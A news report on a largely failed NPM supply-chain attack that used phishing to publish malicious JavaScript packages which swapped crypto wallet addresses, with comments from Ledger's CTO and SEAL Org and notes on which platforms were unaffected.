Several web3 and DeFi platforms, including Uniswap and Aave, stated that they were unaffected.
Ledger’s chief technology officer said Tuesday that a widely watched supply-chain attack on the Node Package Manager ecosystem “fortunately failed,” with “almost no victims,” after a phishing campaign let attackers publish malicious updates to popular JavaScript packages before the compromise was detected and shut down.
Charles Guillemet, Ledger’s CTO, stated the incident began with emails from a spoofed NPM support domain that harvested developer credentials. This allowed hackers to push tainted package versions that hook web-crypto activity across Ethereum, Solana, and other chains by swapping destination addresses inside network responses.
He added that implementation mistakes caused CI/CD pipelines to crash, triggering rapid discovery and limiting the impact size. “The immediate danger may have passed, but the threat hasn’t,” Ledger’s CTO wrote on X, urging users to favor hardware wallets and clear signing protections. The attackers only netted about $503 in crypto, according to onchain analytics firm Arkham, which said the funds went to addresses cited by Guillemet in his initial alert.
The update follows Monday’s industry-wide, as reported by The Block. Security experts urged developers and users to pause onchain activity amid a massive NPM supply-chain event targeting web3 projects. By early Tuesday, multiple crypto teams, including Uniswap, Morpho, MetaMask, OKX Wallet, Sui, Aave, Trezor, and Lido, reported they were not affected.
Security collective SEAL Org called the outcome “lucky,” noting a compromised account with packages downloaded “billions” of times weekly could have yielded “untold riches” had the payload been stealthier.
While the take was minimal this time, industry veterans like Guillemet warned that software supply chain compromises remain a powerful malware vector and are becoming increasingly targeted. The Block recently covered investigative work showing attackers embedding command-and-control instructions behind Ethereum smart contracts to steer NPM-distributed malware, a sign that adversaries are blending onchain and open-source tactics to dodge detection.
